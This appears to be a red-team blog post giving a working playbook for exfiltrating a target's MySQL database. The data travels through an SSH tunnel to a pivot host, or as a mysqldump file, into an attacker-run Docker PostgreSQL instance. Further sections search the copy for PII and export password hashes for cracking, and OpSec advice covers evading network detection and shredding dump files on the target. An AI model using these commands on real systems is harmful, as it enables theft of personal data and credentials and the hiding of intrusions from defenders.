Skip to main content
  1. Posts/

Data exfiltration - Migrating MySQL to PostgreSQL with Docker and pgloader

··853 words·5 mins· loading · loading · ·
Table of Contents

Introduction
#

As a seasoned red team operator, gaining shell access is often just the beginning. The real value—the “crown jewels”—often lives in the database. You might find customer data, intellectual property, or plain-text credentials that unlock the rest of the network.

Often, you land on a target running MySQL. While you can query it in place, this is risky. Long-running analytical queries can spike CPU usage, alert defenders, or even lock production tables, causing a Denial of Service.

The Solution: exfiltrate the data to a local environment where you can analyze it safely and aggressively.

In this guide, we will use Docker to spin up a sacrificial PostgreSQL instance and pgloader to convert the target’s MySQL schema and data into Postgres format.

Why Postgres? Because it offers superior analytical capabilities (regex, full-text search) and integrates better with many offline analysis tools than MySQL. Plus, pgloader handles the dirty work of type conversion for us.


Part 1: The Red Team Infrastructure
#

Before we move data, we need a stable container to hold it. We use Docker to keep our host OS clean.

1. Spinning up PostgreSQL via Docker
#

We must mount a volume so that the data persists even if the container crashes.

# Create a local directory for persistence
mkdir -p ~/loot/postgres_data

# Run the container
# We use Postgres 14 because older versions of pgloader sometimes struggle with SCRAM-SHA-256 in PG 15+
docker run --name postgres-exfil \
  -e POSTGRES_PASSWORD=SuperSecretPassword123 \
  -v ~/loot/postgres_data:/var/lib/postgresql/data \
  -p 5432:5432 \
  -d postgres:14

2. Preparing the Tunnel (For Live Migration)
#

If you have a live connection to the target network, you need to expose the internal MySQL port (3306) to your localhost.

# Local Port Forwarding via SSH
ssh -L 3306:127.0.0.1:3306 user@pivot-host

Note: We assume the MySQL server is listening on localhost of the pivot host. If it’s a different server, adjust the jump.


Part 2: The “Live” Migration (Networked)
#

If you have a high-bandwidth, stable connection, pgloader can stream data directly from the target to your local Docker container. This is the fastest method.

1. Installing pgloader
#

sudo apt-get install pgloader

2. The Migration Command
#

pgloader handles schema translation (e.g., converting MySQL INT(11) to Postgres integer).

# Syntax: pgloader source target
pgloader mysql://root:password@127.0.0.1/target_db \
         postgresql://postgres:SuperSecretPassword123@127.0.0.1/target_db_exfil

Under the Hood:

  1. Connects to MySQL (Target) via the SSH tunnel.
  2. Connects to Postgres (Local) via Docker.
  3. Reads schema, converts types, creates tables.
  4. Batches and streams data.

[!NOTE] If you encounter SSL errors connecting to older MySQL servers, add ?useSSL=false to the source connection string.


Part 3: The “Offline” Migration (Air-Gapped / Restricted)
#

Sometimes, you cannot open a direct tunnel. The network might be unstable, or strict egress filtering blocks your connection. In this case, you must dump the data to a file, exfiltrate the file, and load it locally.

Step 1: Dump on Target
#

Use mysqldump to create a standard SQL backup.

# On the target machine
mysqldump -u root -p --compatible=postgresql --default-character-set=utf8 target_db > dump.sql
  • --compatible=postgresql: Helps (but doesn’t perfectly fix) dialect issues.

Step 2: Exfiltrate
#

Use scp, rsync, or even split it into base64 chunks over DNS if you are desperate.

# Compress it first! Text compresses well.
gzip dump.sql
# Transfer dump.sql.gz to your attacker machine

Step 3: Load with pgloader
#

pgloader can read from files too!

# Decompress on attacker machine
gunzip dump.sql.gz

# Use pgloader to read the file
pgloader dump.sql postgresql://postgres:SuperSecretPassword123@127.0.0.1/target_db_exfil

Part 4: Deep Analysis and Looting
#

Now that you have the data locally, you can run aggressive queries without fear of crashing production.

Finding PII (Personally Identifiable Information)
#

-- Connect to your local exfil DB
psql -h 127.0.0.1 -U postgres -d target_db_exfil

-- Search for columns containing "pass", "ssn", "credit", or "email" across the entire schema
SELECT table_name, column_name
FROM information_schema.columns
WHERE column_name ~* 'pass|ssn|credit|email|token|secret';

Extracting Hashes for Cracking
#

If the MySQL database stored application passwords, export them for Hashcat.

COPY (SELECT username, password FROM users) TO '/tmp/hashes.txt';

Cross-Referencing Data
#

You can now join tables that would be too expensive to join on a live system, hunting for patterns like user reuse of passwords or common email domains.


Part 5: OpSec and Forensic Considerations
#

  1. Network Spike: A “Live” migration creates a massive, sustained download stream. This looks like data exfiltration (because it is). Network flow logs will catch this.

  2. Disk I/O: The “Offline” method creates a large file on the target disk. Ensure you delete dump.sql and dump.sql.gz immediately after transfer. use shred -u if possible.

  3. Process List: mysqldump and ssh processes are visible.

  4. Cleanup:

    # Stop the local container when done analyzing
    docker stop postgres-exfil
    # The data persists in ~/loot/postgres_data if you need it later.
    

Conclusion
#

The combination of Docker and pgloader provides a high-speed, reliable pipeline for analyzing target data. Whether you stream it live through a tunnel or carry it out as a dump file, getting the data onto your own infrastructure allows you to work smarter, not harder.

Data is the ultimate payload. Treat it with respect.

Happy hunting!


References
#

UncleSp1d3r
Author
UncleSp1d3r
As a computer security professional, I’m passionate about building secure systems and exploring new technologies to enhance threat detection and response capabilities. My experience with Rails development has enabled me to create efficient and scalable web applications. At the same time, my passion for learning Rust has allowed me to develop more secure and high-performance software. I’m also interested in Nim and love creating custom security tools.